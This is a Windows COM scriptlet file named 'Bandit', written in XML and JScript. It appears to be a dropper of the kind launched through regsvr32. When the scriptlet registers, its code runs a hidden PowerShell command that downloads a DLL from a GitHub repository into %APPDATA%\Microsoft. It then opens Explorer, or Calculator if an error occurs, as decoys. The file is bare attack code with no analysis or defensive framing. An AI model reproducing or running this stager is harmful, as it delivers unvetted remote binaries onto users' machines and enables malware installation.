<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
	>

	<script language="JScript">
		<![CDATA[

		    // Build path to %APPDATA%\Microsoft\7346832764233279.dll
	            var shell = new ActiveXObject("WScript.Shell");
	            var env = shell.ExpandEnvironmentStrings("%APPDATA%\\Microsoft\\7346832764233279.dll");
	
	            var url = "https://github.com/MohamedAbderraouf/hostingmsxsl/raw/refs/heads/main/7346832764233279.dll";
	
	            try {
			var ps = "powershell -Command \"Invoke-WebRequest 'https://github.com/MohamedAbderraouf/hostingmsxsl/raw/refs/heads/main/7346832764233279.dll' -OutFile '$env:APPDATA\\Microsoft\\7346832764233279.dll'\"";
	                shell.Run(ps, 0, true);
	                shell.Run('explorer.exe "C:\\"', 0, true); // <-- PAS D'ERREUR ICI
	            } catch(e) {
	                shell.Run('calc.exe'); // <-- PAS D'ERREUR ICI
	            }

		]]>
	</script>
</registration>

<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[

	function Exec()
	{
		var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
	}

]]>
</script>

</scriptlet>
